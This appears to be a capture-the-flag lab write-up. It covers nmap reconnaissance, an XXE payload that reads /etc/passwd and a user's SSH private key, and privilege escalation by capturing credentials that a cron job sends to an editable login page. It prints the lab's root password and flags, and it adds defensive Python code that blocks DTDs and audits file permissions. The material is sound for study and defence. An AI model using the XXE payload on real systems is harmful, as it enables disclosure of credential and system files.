nmap -sV -T5 10.10.10.78
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Running dirbuster with medium wordlist
10.10.10.78/hosts.php => There are 4294967294 possible hosts for
This is CIDR notation /0 or Netmask 0.0.0.0
Possible Apache vulnerability
In Apache httpd 2.2.x before 2.2.33 and 2.4.x before 2.4.26, use of the ap_get_basic_auth_pw() by third-party modules outside of the authentication phase may lead to authentication requirements being bypassed.
OpenSSH CVE details
Attempting to ssh reveals we need a publickey
firstname.lastname@example.org: Permission denied (publickey).
Dirbuster found /server-status/ directory. Must be something in there.
Nothing found with php, xml, or txt extensions.
The response headers for the index.html page show an ETag: a request carrying If-None-Match: "2c39-560a6a98ed804-gzip" will get a 304 (Not Modified) response if the page still has this ETag value.
Connecting to the FTP server as anonymous, there is a file "test.txt".
Using "get test.txt -" we can see its contents.
This is XML syntax. This is a hint to use an XML External Entity (XXE) attack, which is on the OWASP Top 10 (2017) list. It lets us abuse a weakly configured XML parser to read information from the server. However, for this to work we must pay attention to the fields in the file we found, to understand how we will obtain the desired data.
You can test whether the site may be vulnerable to XXE by replacing the filename with /dev/random: if the request then hangs (the parser keeps reading), that is a good indicator that it is vulnerable.
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
This gets us the /etc/passwd file, so we can discover the users on the system. We have learned so far that we need a key in order to access the shell via SSH, so let's look for any keys in the home directories of the users found. The first user that stood out to me was the one with a home directory, of course: florian.
Replacing /etc/passwd with /home/florian/.ssh/id_rsa reveals florian's SSH private key (id_rsa). Use this key to obtain a shell on the box.
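The fix on the server side is to never let an untrusted document bring its own DTD. The following is an added example, not code from the writeup or from the box: a hardened parser for the kind of flat request the XML endpoint accepts, built only on Python's standard-library expat binding. The element names (request/filename) and the sample documents are assumptions, since the original test.txt is not reproduced above; the rejection covers both the /etc/passwd read and the /dev/random hang described above, because the parser refuses the document at the DOCTYPE before any entity is ever declared.

```python
import xml.parsers.expat as expat


class UnsafeXMLError(ValueError):
    """Raised when untrusted XML carries a DTD, entity declaration or external entity."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse a flat <request> document into {child_tag: text}, refusing any DTD.

    Rejecting the DOCTYPE up front means the parser never reads an
    <!ENTITY ... SYSTEM ...> declaration, which blocks both file disclosure
    (file:///etc/passwd) and the /dev/random hang used as a probe above.
    """
    parser = expat.ParserCreate()
    fields = {}
    text = []      # character data of the element currently open
    depth = [0]    # nesting depth; only direct children of the root are recorded

    def reject(*_args):
        # expat propagates an exception raised in a handler out of Parse().
        raise UnsafeXMLError("DTD / entity declarations are not allowed")

    # Defence in depth: refuse the DOCTYPE, and also refuse entity
    # declarations and external entity references should one ever be reached.
    parser.StartDoctypeDeclHandler = reject
    parser.EntityDeclHandler = reject
    parser.ExternalEntityRefHandler = reject

    def start(name, attrs):
        depth[0] += 1
        text.clear()

    def chars(chunk):
        text.append(chunk)

    def end(name):
        if depth[0] == 2:                     # direct child of the root element
            fields[name] = "".join(text).strip()
        depth[0] -= 1
        text.clear()

    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(data, True)
    return fields


def accepts(data: bytes) -> bool:
    """True if the document parses under the hardened rules, False if it was rejected."""
    try:
        parse_untrusted_xml(data)
    except (UnsafeXMLError, expat.ExpatError):
        return False
    return True


# Constructed samples; the real test.txt from the box is not reproduced here.
BENIGN_REQUEST = b"<request><filename>test.txt</filename></request>"

XXE_REQUEST = (
    b'<?xml version="1.0" encoding="ISO-8859-1"?>\n'
    b'<!DOCTYPE foo [ <!ELEMENT foo ANY >\n'
    b'<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>\n'
    b'<request><filename>&xxe;</filename></request>\n'
)

# The "does it hang" probe from the writeup: same shape, pointing at /dev/random.
DOS_PROBE = XXE_REQUEST.replace(b"file:///etc/passwd", b"file:///dev/random")


if __name__ == "__main__":
    print("benign:", parse_untrusted_xml(BENIGN_REQUEST))
    for label, doc in (("xxe", XXE_REQUEST), ("dos probe", DOS_PROBE)):
        print(f"{label}: {'accepted' if accepts(doc) else 'rejected'}")
```

The same idea applies to any parser: with lxml you would pass resolve_entities=False and load_dtd=False, and defusedxml wraps the standard-library parsers with these handlers already installed. Whichever library is used, the check to keep is that a DOCTYPE in client-supplied XML is an error, not something the parser tries to honour.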
User.txt = f43bdfbcfd3f2a955a7b67c7a6e21359
Discovered user "cliff".
Using pspy I noticed commands running on a schedule: every minute the following would run.
2018/07/13 08:37:01 CMD: UID=1001 PID=114159 | /usr/bin/python /home/cliff/wp-login.py
2018/07/13 08:37:01 CMD: UID=1001 PID=114158 | /bin/sh -c /usr/bin/python /home/cliff/wp-login.py
2018/07/13 08:37:01 CMD: UID=0 PID=114157 | /usr/sbin/CRON -f
2018/07/13 08:37:01 CMD: UID=1001 PID=114160 | /usr/bin/python /home/cliff/wp-login.py
2018/07/13 08:37:01 CMD: UID=1001 PID=114162 | /usr/bin/python /home/cliff/wp-login.py
We can see the wp-login.py script being run. Let's assume that this script is submitting valid credentials to the wp-login.php file, which we have the ability to alter.
Adding the following line to wp-login.php, we can capture the submitted values.
Noticing the URL encoding, we decode the pwd value and are then able to su to root with the password !KRgYs(JFO!&MTr)lf
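What made the privilege escalation possible is a scheduled job feeding a privileged credential into a file that a less-privileged user could change. The following is an added example, not part of the writeup: the audit a sysadmin would run over the files a cron job executes and posts to, flagging anything alterable by someone other than its owner. It rebuilds the layout from the box (wp-login.py and wp-login.php) under a temporary directory with constructed permissions, so the names mirror the writeup but nothing on a real host is touched; the world-writable mode on the handler stands in for "writable by a user other than its owner".

```python
from __future__ import annotations

import shutil
import stat
import tempfile
from pathlib import Path


def alterable_by_others(path: Path) -> list[str]:
    """Reasons a file used by a scheduled job could be changed by someone
    other than its owner: its own mode bits, or a parent directory that lets
    anyone replace it.  (Ownership mismatches are a separate, root-only check.)"""
    reasons = []
    mode = path.stat().st_mode
    if mode & stat.S_IWOTH:
        reasons.append("file is world-writable")
    elif mode & stat.S_IWGRP:
        reasons.append("file is group-writable")
    pmode = path.parent.stat().st_mode
    if pmode & (stat.S_IWGRP | stat.S_IWOTH) and not pmode & stat.S_ISVTX:
        reasons.append("parent directory lets others replace the file")
    return reasons


def audit_job_targets(targets: dict[str, Path]) -> dict[str, list[str]]:
    """targets maps a label (the cron command, or the endpoint it posts to)
    to the local file behind it; returns only the labels with findings."""
    return {label: r for label, p in targets.items() if (r := alterable_by_others(p))}


def demo() -> dict[str, list[str]]:
    """Rebuild the layout from the writeup under a temp dir: the cron script
    and the web handler it submits credentials to.  Paths and modes are
    constructed here to mirror the box; nothing on the real host is touched."""
    root = Path(tempfile.mkdtemp())
    try:
        script = root / "home" / "cliff" / "wp-login.py"
        handler = root / "var" / "www" / "html" / "wp-login.php"
        for p in (script, handler):
            p.parent.mkdir(parents=True)
            p.write_text("# placeholder\n")
        script.parent.chmod(0o700)
        script.chmod(0o644)          # the script itself is fine
        handler.parent.chmod(0o755)
        handler.chmod(0o666)         # the weak setting: anyone can edit the login handler
        return audit_job_targets({
            "/usr/bin/python /home/cliff/wp-login.py": script,
            "POST target /wp-login.php": handler,
        })
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for label, reasons in demo().items():
        print(f"{label}: {', '.join(reasons)}")
```

Run as-is, the only finding is the web handler. The useful part of the check is the second question it asks: even a file with sane mode bits is replaceable if its directory is writable by others, so both the file and its parent need to be looked at before trusting anything a job sends credentials to.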
Root.txt = 9a9da52d7aad358699a96a5754595de6